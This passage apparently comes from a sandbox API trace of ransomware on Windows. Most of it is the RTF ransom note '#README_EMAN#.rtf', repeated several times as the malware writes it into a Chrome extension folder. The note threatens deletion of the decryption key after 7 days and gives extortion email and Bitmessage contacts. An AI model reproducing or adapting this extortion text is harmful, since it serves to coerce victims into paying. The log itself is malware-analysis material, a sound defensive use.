reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.542] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.542] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.733] CloseHandle (hObject=0x228) returned 1 [0284.733] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0284.733] GetLastError () returned 0x2 [0284.733] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your 